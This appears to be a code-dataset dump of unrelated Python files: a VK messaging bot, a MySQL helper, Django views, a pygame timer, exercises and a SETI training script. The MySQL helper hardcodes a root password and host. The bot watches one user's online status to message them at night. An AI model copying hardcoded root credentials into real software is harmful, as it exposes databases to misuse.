Parse any arguments passed by the cmd-line.\"\"\"\n with get_db_context(commit=True) as (db_conn, db):\n for status in update_channels(db_conn, db):\n logger.info(str(status))\n for status in download_all_missing_videos(db_conn, db):\n logger.info(status)\n return 0\n","sub_path":"lib/plugins/videos/downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":11649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"439462695","text":"import vk_api\nimport vk_messages\nfrom time import sleep\nimport datetime as dt\nimport os\n\n\nTOKEN = os.environ.get('VK_TOKEN')\nassert TOKEN, 'environment variable VK_TOKEN is absent or empty'\nPOLL_DELAY = 5\ntarget_ids = [299488530]\nmessages = ['Чево не спиш? 🌚']\ntime_intervals = [(dt.time(0, 30), dt.time(5, 20))]\n\n\ndef sub_times(start_time: dt.time, stop_time: dt.time):\n date = dt.date(1, 1, 1)\n datetime1 = dt.datetime.combine(date, start_time)\n datetime2 = dt.datetime.combine(date, stop_time)\n return datetime1 - datetime2\n\n\ndef time_in_range(time, range1, range2=None):\n if isinstance(range1, tuple) or isinstance(range1, list):\n if len(range1) == 2:\n range2 = range1[1]\n range1 = range1[0]\n assert range2, 'range2 is absent nor range1 is iterable'\n assert sub_times(range2, range1) > dt.timedelta(0), 'range1 is bigger than range2'\n return sub_times(time, range1) > dt.timedelta(0) and sub_times(time, range2) < dt.timedelta(0)\n\n\ndef log(*args, sep=' ', end='\\n'):\n _args = [dt.datetime.now().strftime('[%d.%m %H:%M:%S]')] + list(args)\n print(*_args, sep=sep, end=end)\n\n\ndef main(vk: vk_api.VkApi):\n assert len(target_ids) == len(messages) == len(time_intervals), \\\n 'lengths of target_ids, messages and time_intervals are not same'\n\n if len(target_ids) == 0:\n print('target_ids is empty')\n return\n\n login = os.environ.get('VK_LOGIN')\n password = os.environ.get('VK_PASSWORD')\n assert login, 'environment variable VK_LOGIN is absent or empty'\n assert login, 'environment variable VK_PASSWORD is absent or empty'\n vk_messages.auth(login, password)\n log('Authenticated')\n\n while True:\n user_ids = ','.join(map(str, target_ids))\n users = vk.users.get(user_ids=user_ids, fields='online')\n log('Got user ids')\n\n for user in users:\n if user['online'] == 1:\n user_id = user['id']\n index = target_ids.index(user_id)\n message = messages[index]\n if not time_in_range(dt.datetime.now().time(), time_intervals[index]):\n log(f'User {user_id} is online but current time is not in the given interval')\n continue\n # log(f'User {user_id} is online. Message: {message}. Index: {index}')\n\n vk_messages.send(user_id, message)\n log(f'Sent {message} to user {user_id}')\n\n target_ids.pop(index)\n messages.pop(index)\n time_intervals.pop(index)\n log(f'Popped index {index} from target_ids, messages and time_intervals')\n log('Now target_ids, messages and time_intervals are', target_ids, messages, time_intervals)\n\n if len(target_ids) == 0 or len(messages) == 0:\n log('No messages to send anymore. Returning')\n return\n\n log('Completed loop')\n sleep(POLL_DELAY)\n\n\nif __name__ == '__main__':\n vk_session = vk_api.VkApi(token=TOKEN)\n main(vk_session.get_api())\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"339186306","text":"\"\"\"\n3. 
Create a text file (not programmatically) and write employees' surnames and their salaries line by line.\nDetermine which employees have a salary below 20 thousand and print their surnames.\nCompute the average income of the employees.\n\"\"\"\n\nfrom functools import reduce\n\n\ndef less_then():\n minimum_salary = 20000\n salary_list = []\n less_then_list = []\n\n with open('../lesson-5/task-3.txt', 'r') as fd:\n for line in fd:\n surname, salary = line.split()\n salary_list.append(int(salary))\n if int(salary) < minimum_salary:\n less_then_list.append(f'employee {surname} has a salary below {minimum_salary}')\n\n average_salary = reduce(lambda a, b: a + b, salary_list) / len(salary_list)\n return average_salary, less_then_list\n\n\nif __name__ == '__main__':\n with open('../lesson-5/task-3.txt', 'a+') as f:\n while True:\n data = input('Enter an employee surname and salary. stop - finish input\\n')\n if data == 'stop':\n break\n f.write(data + '\\n')\n\n av_salary, less_then_min = less_then()\n print(f'{less_then_min}')\n print(f'Average salary: {int(av_salary)}')\n","sub_path":"lesson-5/task-3.py","file_name":"task-3.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"632280016","text":"from pygame import time\n\n\nclass Timer:\n\n def __init__(self, frames, wait=100, frame_index=0, step=1, loop_once=False):\n self.frames = frames\n self.wait = wait\n self.frame_index = frame_index\n self.step = step\n self.loop_once = loop_once\n self.finished = False\n self.last_frame = len(frames) - 1 if step == 1 else 0\n self.last = None\n\n def _get_frame_index(self):\n now = time.get_ticks()\n if self.last is None:\n self.last = now\n self.frame_index = 0 if self.step == 1 else len(self.frames) - 1\n return 0\n elif not self.finished and now - self.last > self.wait:\n self.frame_index += self.step\n if self.loop_once and self.frame_index == self.last_frame:\n self.finished = True\n else:\n self.frame_index %= len(self.frames)\n self.last = now\n return self.frame_index\n\n def reset(self):\n self.last = None\n self.finished = False\n\n def get_image(self):\n return self.frames[self._get_frame_index()]\n","sub_path":"utilities/timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"447544077","text":"import json\nimport argparse\n\n\nparser = argparse.ArgumentParser(\"Searches for IP links in result file\")\nparser.add_argument('--file', required=True, help=\"JSON file to read from\")\nparser.add_argument('--source', required=True, help=\"Source address\")\nparser.add_argument('--target', required=True, help=\"Target address\")\nargs = parser.parse_args()\n\nwith open(args.file, 'rb') as f:\n data = json.load(f)\n\npath_list = []\nfor e in data:\n # Use path to build a graph!\n for i in range(1, len(e['path'])):\n source = e['path'][i-1]['addr']\n target = e['path'][i]['addr']\n if ((source == args.source and target == args.target) or\n (source == args.target and target == args.source)):\n print(\" -- \".join([p['addr'] for p in e['path']]))\n\n\n\n# Let the search begin\n\n","sub_path":"search-ip-path.py","file_name":"search-ip-path.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"228281429","text":"import cv2 as cv\ncap = cv.VideoCapture(0) # '0' for 
webcam\nwhile cap.isOpened():\n _, img = cap.read()\n cv.putText(img, 'hello', (30,300), cv.FONT_HERSHEY_SIMPLEX, 2, (255,0,0)) \n cv.imshow('MediaPipe Hands', img)\n if cv.waitKey(5) & 0xFF == 27:\n break\ncap.release()\ncv.destroyAllWindows()","sub_path":"week9/webcam.py","file_name":"webcam.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"370991474","text":"#coding:utf-8\nimport pymysql.cursors\nimport json\nclass OperationMysql:\n\tdef __init__(self):\n\t\tself.conn = pymysql.connect(\n\t\t\thost='10.10.13.71',\n\t\t\tport=3306,\n\t\t\tuser='root',\n\t\t\tpasswd='root-jc-211@#$',\n\t\t\tdb='jc_oa',\n\t\t\tcharset='utf8',\n\t\t\tcursorclass=pymysql.cursors.DictCursor\n\t\t\t)\n\t\tself.cur = self.conn.cursor()\n\n\t#查询一条数据\n\tdef search_one(self,sql):\n\t\tself.cur.execute(sql)\n\t\t# result = self.cur.fetchall()\n\t\tresult = self.cur.fetchone()\n\t\tresult = json.dumps(result, ensure_ascii=False)\n\t\treturn result\n\n\t#查询多条数据\n\tdef search_all(self,sql):\n\t\tself.cur.execute(sql)\n\t\tresult = self.cur.fetchall()\n\t\t# result = self.cur.fetchone()\n\t\tresult = json.dumps(result, ensure_ascii=False)\n\t\treturn result\n\n\nif __name__ == '__main__':\n\top_mysql = OperationMysql()\n\tres = op_mysql.search_all(\"select * from oa_obs where status = 1 and isno_company = 1\")\n\tprint(res)","sub_path":"util/connect_db.py","file_name":"connect_db.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"387938825","text":"from IslandTile import IslandTile\nfrom enemy.enemy import Crab, Crocodile, Deer, Dragon, Gecko, Gladiator, Monkey, Monsters, Rabbit, Samurai, Spider\nfrom item.items import Blue_Fruit, Emerald, Purple_Fruit, Red_Fruit, Rusty_Blade, White_Fruit\n\n# temple\ntemple_items = (Red_Fruit)\ntemple_encounters = (Monkey,)\n\n# spring\nspring_items = (Blue_Fruit)\nspring_encounters = (Crocodile, )\n\n# beach\nbeach_items = (Rusty_Blade)\nbeach_encounters = (Crab, Gecko)\n\n# ravine\nravine_items = (Emerald)\nravine_encounters = (None)\n\n# camp\ncamp_items = (None)\ncamp_encounters = (Deer, Gecko, Rabbit)\n\n# pit\npit_items = (Purple_Fruit)\npit_encounters = (Gladiator, )\n\n# ruins\nruins_items = (White_Fruit)\nruins_encounters = (Samurai,)\n\n# cave\ncave_items = (None)\ncave_encounters = (Spider, )\n\n# mountain\nmountain_items = (None)\nmountain_encounters = (Dragon, )\n\n\n\n\ntemple = IslandTile(\"the Temple\", temple_items , temple_encounters, \"As you push your way through the thick vegetation, you stumble upon an ancient Temple standing stalwart in a small clearing. The area around the temple seems quiet. Too quiet...\")\nspring = IslandTile(\"the Spring\", spring_items, spring_encounters,\"The soft gurgle of water leads you up a small bluff to reveal a small spring, its waters bubbling out of the rocks.\")\nbeach = IslandTile(\"the Beach\", beach_items, beach_encounters, \"You emerge from the jungle onto the beach. 'If I weren't stuck here, this beach would be a beautiful place,' you think to yourself bitterly.\")\nravine = IslandTile(\"the Ravine\", ravine_items, ravine_encounters, \"There is barely any warning as you emerge from the jungle and find yourself facing a massive ravine. 
You look precariously over the edge, but it is so deep you cannot see the bottom\")\ncamp = IslandTile(\"your campsite\",camp_items, camp_encounters,\"You are back at your meager camp\")\npit = IslandTile(\"the Fighting Pit\", pit_items, pit_encounters, \"An old pit used as a battleground between fighters for entertainment. Some of the fighting blood still remains...\")\nruins = IslandTile(\"the Ancient Ruins\", ruins_items, ruins_encounters, \"The ruins of a civilization remain in a withered form of its old self. Ghosts of the past may still remain...\")\ncave = IslandTile('the Cave', cave_items, cave_encounters, 'A dark hole in the ground with webs crawling out of the front.')\nmountain = IslandTile('the Towering Mountain', mountain_items, mountain_encounters, 'A towering mountain that looms above the whole island. A faint glow can be seen at the top.')","sub_path":"Day1.5/Escape_the_Island_App/islandTiles/tiles.py","file_name":"tiles.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"446110674","text":"from django import forms\nfrom dashboard.models import Review\n\nclass ReviewForm(forms.ModelForm):\n class Meta:\n model = Review\n fields = ('number', 'game', 'release_date', 'price', 'owners', 'developer', 'publisher', 'average_playtime', 'median_playtime', 'metascore')\n labels = {\n 'number': 'Numero',\n 'game': 'Jogo',\n 'release_date': 'Data de lançamento',\n 'price': 'Preço',\n 'owners': 'Jogadores',\n 'developer': 'Desenvolvedor',\n 'publisher': 'Publicador',\n 'average_playtime': 'Tempo medio de jogo',\n 'median_playtime': 'Tempo mediano de jogo',\n 'metascore': 'Metascore',\n }","sub_path":"dashboard/forms/Review.py","file_name":"Review.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"193673763","text":"# -*- coding: UTF-8 -*-\ndef separation(func):\n print('——' * 30)\n print(func.__doc__)\n print('——' * 30)\n func()\n print('——' * 30)\ndef _005():\n \"\"\"005 Read three integers x, y, z and print them in ascending order.\"\"\"\n lis = []\n for i in range(3):\n lis.append(int(input('Enter an integer: ')))\n lis.sort()\n print('Sorted:', lis)\ndef _006():\n \"\"\"006 Fibonacci sequence: print 0, 1, 1, 2, 3, 5, 8, 13, 21, 34, and so on.\"\"\"\n def fib(n):\n if n == 0:\n return 0\n elif n == 1:\n return 1\n else:\n return fib(n-1) + fib(n-2)\n x = int(input('How many terms: '))\n for i in range(x):\n print(fib(i), end=' ')\n print()\ndef _007():\n \"\"\"007 Copy the data of one list into another list.\"\"\"\n x = input('Enter a comma-separated list: ')\n lis = x.split(',')\n for i, s in enumerate(lis):\n lis[i] = int(s)\n print('Input list:', lis)\n lis2 = lis[:]\n print('New list:', lis2)\ndef _008():\n \"\"\"008 Print the 9x9 multiplication table.\"\"\"\n for i in range(1, 10):\n for j in range(1, 10):\n if i >= j:\n print('{}×{}={:<2d}'.format(j, i, i*j), end=' ')\n print()\n\n\nseparation(_008)\n","sub_path":"Python Exercise.py","file_name":"Python Exercise.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"548330383","text":"import atexit\nimport getpass\nimport os\nimport warnings\nfrom pathlib import Path\n\nimport mlcrate as mlc\nimport neptune.new as neptune\nimport numpy as np\nimport pandas as pd\nimport torch\nimport torch.nn as nn\nimport torchvision\nimport ttach as tta\nfrom adabelief_pytorch import AdaBelief\nfrom augmentations.augmentation import seti_transform0\nfrom augmentations.strong_aug import *\nfrom cuml.metrics import log_loss # , 
roc_auc_score\nfrom dataset import SetiDataset\nfrom fastprogress.fastprogress import force_console_behavior\nfrom iterstrat.ml_stratifiers import MultilabelStratifiedKFold\nfrom losses import FocalLoss, RocAucLoss, ROCStarLoss\nfrom madgrad import MADGRAD\nfrom models.resnetrs import ResNet_18RS, resnetrs_init_weights\nfrom omegaconf import OmegaConf\nfrom optimizer.sam import SAM\nfrom pandarallel import pandarallel\nfrom sampling import get_sampling\nfrom sklearn.metrics import roc_auc_score\nfrom timm.models import *\nfrom timm.models.nfnet import *\nfrom torch.cuda.amp import GradScaler, autocast\nfrom torch.optim import SGD, Adam\nfrom torch.optim.lr_scheduler import (\n CosineAnnealingLR,\n CosineAnnealingWarmRestarts,\n ReduceLROnPlateau,\n)\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\nfrom utils import (\n Mish,\n TanhExp,\n find_exp_num,\n get_logger,\n parse_args,\n remove_abnormal_exp,\n replace_activations,\n save_model,\n seed_everything,\n)\nfrom validation import get_validation\n\npandarallel.initialize(progress_bar=True)\nwarnings.filterwarnings(\"ignore\")\ntqdm.pandas()\nmaster_bar, progress_bar = force_console_behavior()\n\n\ndef main():\n run = neptune.init(\n project=\"karunru/seti\",\n api_token=os.environ[\"NEPTUNE_SETI_API_TOKEN\"],\n )\n\n args = parse_args()\n config = OmegaConf.load(args.config)\n config.merge_with_dotlist(args.options)\n atexit.register(\n remove_abnormal_exp, log_path=config.log_path, config_path=config.config_path\n )\n seed_everything(config.seed)\n\n exp_num = find_exp_num(log_path=config.log_path)\n exp_num = str(exp_num).zfill(3)\n run[\"exp_num\"] = exp_num\n\n config.weight_path = str(Path(config.weight_path) / f\"exp_{exp_num}\")\n os.makedirs(config.weight_path, exist_ok=True)\n config.pred_path = str(Path(config.pred_path) / f\"exp_{exp_num}\")\n os.makedirs(config.pred_path, exist_ok=True)\n OmegaConf.save(config, Path(config.config_path) / f\"exp_{exp_num}.yaml\")\n run[\"params\"] = config\n logger, csv_logger = get_logger(config, exp_num)\n timer = mlc.time.Timer()\n logger.info(mlc.time.now())\n logger.info(f\"config: {config}\")\n\n train_df = pd.read_csv(Path(config.root) / \"train_labels.csv\")\n train_df[\"file_name\"] = train_df[\"id\"].parallel_apply(\n lambda id: Path(config.root) / f\"train/{id[0]}/{id}.npy\"\n )\n X = train_df[\"file_name\"].values\n y = train_df[\"target\"].values\n\n transform = eval(config.transform.name)(config.transform.size)\n logger.info(f\"augmentation: {transform}\")\n strong_transform = eval(config.strong_transform.name)\n logger.info(f\"strong augmentation: {config.strong_transform.name}\")\n\n splits = get_validation(train_df, config)\n\n scores = np.zeros(len(splits))\n for fold, (train_idx, val_idx) in enumerate(splits):\n\n X_train, X_val = X[train_idx], X[val_idx]\n y_train, y_val = y[train_idx], y[val_idx]\n X_train, y_train = get_sampling(X_train.reshape(-1, 1), y_train, config)\n X_train = X_train.reshape(-1)\n train_data = SetiDataset(\"train\", X_train, y_train, transform[\"albu_train\"])\n val_data = SetiDataset(\"val\", X_val, y_val, transform[\"albu_val\"])\n train_loader = DataLoader(train_data, **config.train_loader)\n val_loader = DataLoader(val_data, **config.val_loader)\n\n model = eval(config.model)(pretrained=False)\n if config.model == \"ResNet_18RS\":\n if config.dino_pretrained_path is not None:\n print(f\"load {config.dino_pretrained_path}\")\n state_dict = torch.load(\n config.dino_pretrained_path, map_location=\"cpu\"\n )[\"teacher\"]\n state_dict 
= {\n k.replace(\"module.\", \"\"): v for k, v in state_dict.items()\n }\n state_dict = {\n k.replace(\"backbone.\", \"\"): v for k, v in state_dict.items()\n }\n model.load_state_dict(state_dict, strict=False)\n else:\n resnetrs_init_weights(model)\n elif config.model == \"resnet18\":\n model = torchvision.models.resnet18(pretrained=False)\n state_dict = torch.load(config.dino_pretrained_path, map_location=\"cpu\")[\n \"teacher\"\n ]\n state_dict = {k.replace(\"module.\", \"\"): v for k, v in state_dict.items()}\n state_dict = {k.replace(\"backbone.\", \"\"): v for k, v in state_dict.items()}\n model.load_state_dict(state_dict, strict=False)\n\n if \"fc.weight\" in model.state_dict().keys():\n model.fc = nn.Linear(model.fc.in_features, config.train.num_labels)\n elif \"classifier.weight\" in model.state_dict().keys():\n model.classifier = nn.Linear(\n model.classifier.in_features, config.train.num_labels\n )\n elif \"head.fc.weight\" in model.state_dict().keys():\n model.head.fc = nn.Linear(\n model.head.fc.in_features, config.train.num_labels\n )\n elif \"head.weight\" in model.state_dict().keys():\n model.head = nn.Linear(model.head.in_features, config.train.num_labels)\n\n model = model.cuda()\n\n if config.use_SAM:\n optimizer = eval(config.optimizer.name)\n optimizer = SAM(\n model.parameters(),\n base_optimizer=optimizer,\n rho=0.15,\n adaptive=True,\n lr=config.optimizer.lr,\n )\n scheduler = eval(config.scheduler.name)(\n optimizer.base_optimizer,\n max(1, config.train.epoch // config.scheduler.cycle),\n eta_min=config.scheduler.eta_min,\n )\n else:\n optimizer = eval(config.optimizer.name)(\n model.parameters(), lr=config.optimizer.lr\n )\n scheduler = eval(config.scheduler.name)(\n optimizer,\n max(1, config.train.epoch // config.scheduler.cycle),\n eta_min=config.scheduler.eta_min,\n )\n\n criterion = eval(config.loss)()\n scaler = GradScaler()\n\n best_acc = 0\n best_loss = 1e10\n mb = master_bar(range(config.train.epoch))\n for epoch in mb:\n timer.add(\"train\")\n # if (config.model.simsiam_pretrained_path is not None) and epoch == 5:\n # model.requires_grad_(True)\n\n train_loss, train_acc = train(\n config,\n model,\n transform[\"torch_train\"],\n strong_transform,\n train_loader,\n optimizer,\n criterion,\n mb,\n epoch,\n scaler,\n )\n train_time = timer.fsince(\"train\")\n\n timer.add(\"val\")\n val_loss, val_acc, oof_pred = validate(\n config, model, transform[\"torch_val\"], val_loader, criterion, mb, epoch\n )\n val_time = timer.fsince(\"val\")\n\n output1 = \"epoch: {} train_time: {} validate_time: {}\".format(\n epoch, train_time, val_time\n )\n output2 = \"train_loss: {:.3f} train_auc: {:.3f} val_loss: {:.3f} val_auc: {:.3f}\".format(\n train_loss, train_acc, val_loss, val_acc\n )\n logger.info(output1)\n logger.info(output2)\n mb.write(output1)\n mb.write(output2)\n csv_logger.write([fold, epoch, train_loss, train_acc, val_loss, val_acc])\n run[f\"fold_{fold}/train_loss\"].log(train_loss)\n run[f\"fold_{fold}/train_auc\"].log(train_acc)\n run[f\"fold_{fold}/val_loss\"].log(val_loss)\n run[f\"fold_{fold}/val_auc\"].log(val_acc)\n\n scheduler.step()\n\n if val_loss < best_loss:\n best_loss = val_loss\n save_name = Path(config.weight_path) / f\"best_loss_fold{fold}.pth\"\n save_model(save_name, epoch, val_loss, val_acc, model, optimizer)\n if val_acc > best_acc:\n best_acc = val_acc\n scores[fold] = best_acc\n train_df.loc[val_idx, \"oof_pred\"] = oof_pred\n save_name = Path(config.weight_path) / f\"best_acc_fold{fold}.pth\"\n save_model(save_name, epoch, val_loss, 
val_acc, model, optimizer)\n\n save_name = Path(config.weight_path) / f\"last_epoch_fold{fold}.pth\"\n save_model(save_name, epoch, val_loss, val_acc, model, optimizer)\n\n del model\n torch.cuda.empty_cache()\n\n train_df[[\"id\", \"target\", \"oof_pred\"]].to_csv(\n Path(config.pred_path) / \"oof_pred.csv\", index=False\n )\n\n run[\"mean_cv_auc\"] = np.mean(scores)\n run[\"oof_auc\"] = roc_auc_score(\n train_df[\"target\"].values, train_df[\"oof_pred\"].values\n )\n\n\n@torch.enable_grad()\ndef train(\n config,\n model,\n transform,\n strong_transform,\n loader,\n optimizer,\n criterion,\n mb,\n epoch,\n scaler,\n):\n preds = []\n gt = []\n losses = []\n scores = []\n\n model.train()\n for it, (images, labels) in enumerate(progress_bar(loader, parent=mb)):\n images = images.cuda()\n labels = labels.cuda()\n images = transform(images)\n\n if config.use_SAM:\n\n # first step\n if epoch < config.train.epoch - 5:\n with autocast():\n images, labels_a, labels_b, lam = strong_transform(\n images, labels, **config.strong_transform.params\n )\n logits = model(images)\n loss = criterion(logits, labels_a) * lam + criterion(\n logits, labels_b\n ) * (1 - lam)\n loss /= config.train.accumulate\n\n loss = (loss - config.flooding.b).abs() + config.flooding.b\n else:\n with autocast():\n logits = model(images)\n loss = criterion(logits, labels)\n loss /= config.train.accumulate\n\n loss.backward()\n if (it + 1) % config.train.accumulate == 0:\n optimizer.first_step(zero_grad=True)\n\n # second step\n if epoch < config.train.epoch - 5:\n with autocast():\n images, labels_a, labels_b, lam = strong_transform(\n images, labels, **config.strong_transform.params\n )\n logits = model(images)\n loss = criterion(logits, labels_a) * lam + criterion(\n logits, labels_b\n ) * (1 - lam)\n loss /= config.train.accumulate\n\n loss = (loss - config.flooding.b).abs() + config.flooding.b\n else:\n with autocast():\n logits = model(images)\n loss = criterion(logits, labels)\n loss /= config.train.accumulate\n\n loss.backward()\n if (it + 1) % config.train.accumulate == 0:\n optimizer.second_step(zero_grad=True)\n else:\n if epoch < config.train.epoch - 5:\n with autocast():\n images, labels_a, labels_b, lam = strong_transform(\n images, labels, **config.strong_transform.params\n )\n logits = model(images)\n loss = criterion(logits, labels_a) * lam + criterion(\n logits, labels_b\n ) * (1 - lam)\n loss /= config.train.accumulate\n\n loss = (loss - config.flooding.b).abs() + config.flooding.b\n else:\n with autocast():\n logits = model(images)\n loss = criterion(logits, labels)\n loss /= config.train.accumulate\n\n scaler.scale(loss).backward()\n if (it + 1) % config.train.accumulate == 0:\n scaler.step(optimizer)\n scaler.update()\n optimizer.zero_grad()\n\n logits = logits.sigmoid().detach().cpu().numpy().astype(float)\n labels = labels.detach().cpu().numpy().astype(int)\n score = log_loss(labels.reshape(-1), logits.reshape(-1))\n scores.append(score)\n preds.append(logits)\n gt.append(labels)\n losses.append(loss.item())\n\n mb.child.comment = \"loss: {:.3f} avg_loss: {:.3f} log_loss: {:.3f} avg_log_loss: {:.3f}\".format(\n loss.item(),\n np.mean(losses),\n score,\n np.mean(scores),\n )\n\n if config.loss == \"ROCStarLoss\":\n criterion.last_whole_y_t = torch.tensor(criterion.whole_y_t).cuda()\n criterion.last_whole_y_pred = torch.tensor(criterion.whole_y_pred).cuda()\n criterion.epoch_update_gamma(epoch)\n\n preds = np.concatenate(preds)\n gt = np.concatenate(gt)\n score = roc_auc_score(gt.reshape(-1), 
preds.reshape(-1))\n return np.mean(losses), score\n\n\n@torch.no_grad()\ndef validate(config, model, transform, loader, criterion, mb, device):\n preds = []\n gt = []\n losses = []\n\n if config.TTA:\n model = tta.ClassificationTTAWrapper(\n model=model, transforms=tta.aliases.flip_transform(), merge_mode=\"mean\"\n )\n model.eval()\n for it, (images, labels) in enumerate(progress_bar(loader, parent=mb)):\n images = images.cuda()\n labels = labels.cuda()\n images = transform(images)\n\n logits = model(images)\n loss = criterion(logits, labels) / config.train.accumulate\n\n logits = logits.sigmoid().cpu().numpy()\n labels = labels.cpu().numpy().astype(int)\n preds.append(logits)\n gt.append(labels)\n losses.append(loss.item())\n\n preds = np.concatenate(preds)\n gt = np.concatenate(gt)\n score = roc_auc_score(gt.reshape(-1), preds.reshape(-1))\n\n return np.mean(losses), score, preds\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":14532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"575865799","text":"'''\n fmt = getattr(settings, 'LOG_FORMAT', None)\n lvl = getattr(settings, 'LOG_LEVEL', logging.DEBUG)\n\n logging.basicConfig(format=fmt, level=lvl)\n logging.debug(newobject.OrderId.id)\n '''\nfrom django.shortcuts import render\nfrom django.shortcuts import get_object_or_404\nfrom django.http import JsonResponse\nfrom django.template.loader import render_to_string\n\nimport jdatetime\nfrom django.http import HttpResponseRedirect\nfrom django.http import HttpResponse\nfrom django.views.decorators import csrf\nimport django.core.serializers\nimport logging\nfrom django.conf import settings\n\nfrom cmms.models.Asset import *\n\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.utils.decorators import method_decorator\n\n#from django.core import serializers\nimport json\nfrom django.forms.models import model_to_dict\nfrom cmms.forms import AssetLifeForm\nfrom cmms.business.updateAssetStatus import *\n###################################################################\n@csrf_exempt\ndef list_assetLife(request,id=None):\n books = AssetLife.objects.all()\n return render(request, 'cmms/asset_life/assetLifeList.html', {'assetLifes': books})\n\n\n###################################################################\n@csrf_exempt\ndef js_list_assetLife(request,woId):\n data=dict()\n books=AssetLife.objects.filter(assetLifeAssetid=woId).order_by('-id')[:5]\n\n data['html_assetLife_list']= render_to_string('cmms/asset_life/partialAssetLifelist.html', {\n 'assetLifes': books\n })\n data['form_is_valid']=True\n return JsonResponse(data)\n\n\n################################################################### ###################################################################\n@csrf_exempt\ndef save_assetLife_form(request, form, template_name,woId=None):\n data = dict()\n assetStatus=False\n\n if (request.method == 'POST'):\n \n\n if form.is_valid():\n\n form.save()\n data['form_is_valid'] = True\n\n books = AssetLife.objects.filter(assetLifeAssetid=woId).order_by('-id')[:5]\n data['html_assetLife_list'] = render_to_string('cmms/asset_life/partialAssetLifelist.html', {\n 'assetLifes': books\n })\n else:\n fmt = getattr(settings, 'LOG_FORMAT', None)\n lvl = getattr(settings, 'LOG_LEVEL', logging.DEBUG)\n logging.basicConfig(format=fmt, level=lvl)\n logging.debug(form.errors)\n\n\n\n\n\n\n\n context = {'form': form,'assetStatus':assetStatus}\n 
data['html_assetLife_form'] = render_to_string(template_name, context, request=request)\n return JsonResponse(data)\n\n###################################################################\n\n@csrf_exempt\ndef assetLife_delete(request, id):\n comp1 = get_object_or_404(AssetLife, id=id)\n data = dict()\n\n if (request.method == 'POST'):\n comp1.delete()\n data['form_is_valid'] = True # This is just to play along with the existing code\n companies = AssetLife.objects.all()\n data['html_assetLife_list'] = render_to_string('cmms/asset_life/partialAssetLifelist.html', {\n 'assetLife': companies\n })\n else:\n context = {'assetLife': comp1}\n data['html_assetLife_form'] = render_to_string('cmms/asset_life/partialAssetLifeDelete.html',\n context,\n request=request,\n )\n return JsonResponse(data)\n###################################################################\n@csrf_exempt\ndef assetLife_create(request,assetId=None):\n woId=-1\n if(assetId!=None):\n woId=assetId\n\n if (request.method == 'POST'):\n body_unicode = request.body.decode('utf-8')\n body = json.loads(body_unicode)\n print(body)\n\n\n data = request.POST.dict()\n data['assetLifeAssetid']=body['assetLifeAssetid']\n data['assetOfflineFrom']=body['assetOfflineFrom']\n data['assetSetOfflineByUser']=body['assetSetOfflineByUser']\n data['assetOfflineStatus']=body['assetOfflineStatus']\n data['assetWOAssoc']=body['assetWOAssoc']\n data['assetOfflineAdditionalInfo']=body['assetOfflineAdditionalInfo']\n data['assetEventType']=body['assetEventType']\n data['assetEventDescription']=body['assetEventDescription']\n woId=body['assetLifeAssetid']\n print(\"dsadsadsa%%%%%%%\"+str(body['assetOnlineStatus']))\n if (body['assetOnlineStatus']!=-1):\n\n data['assetOnlineFrom']=body['assetOnlineFrom']\n data['assetSetOnlineByUser']=body['assetSetOnlineByUser']\n\n data['assetOnlineStatus']=body['assetOnlineStatus']\n data['assetOnlineAdditionalInfo']=body['assetOnlineAdditionalInfo']\n data['assetOnlineProducteHourAffected']=body['assetOnlineProducteHourAffected']\n\n\n\n form = AssetLifeForm(data)\n # AssetStatus.ReverseAssetStatus(woId)\n\n\n\n\n else:\n form = AssetLifeForm()\n\n return save_assetLife_form(request, form, 'cmms/asset_life/partialAssetLifeCreate.html',woId)\n###################################################################\n\n@csrf_exempt\ndef assetLife_update(request, id):\n company= get_object_or_404(AssetLife, id=id)\n woId=company.assetLifeAssetid\n #parrent asset\n\n\n if (request.method == 'POST'):\n\n body_unicode = request.body.decode('utf-8')\n body = json.loads(body_unicode)\n\n\n data = request.POST.dict()\n\n data['assetLifeAssetid']=body['assetLifeAssetid']\n data['assetOfflineFrom']=body['assetOfflineFrom']\n data['assetSetOfflineByUser']=body['assetSetOfflineByUser']\n data['assetOfflineStatus']=body['assetOfflineStatus']\n data['assetWOAssoc']=body['assetWOAssoc']\n data['assetOfflineAdditionalInfo']=body['assetOfflineAdditionalInfo']\n data['assetEventType']=body['assetEventType']\n data['assetEventDescription']=body['assetEventDescription']\n\n if (body['assetOnlineStatus']!=-1):\n\n data['assetOnlineFrom']=body['assetOnlineFrom']\n data['assetSetOnlineByUser']=body['assetSetOnlineByUser']\n\n data['assetOnlineStatus']=body['assetOnlineStatus']\n data['assetOnlineAdditionalInfo']=body['assetOnlineAdditionalInfo']\n data['assetOnlineProducteHourAffected']=body['assetOnlineProducteHourAffected']\n woId.assetStatus=True\n woId.save()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n form = AssetLifeForm(data, instance=company)\n 
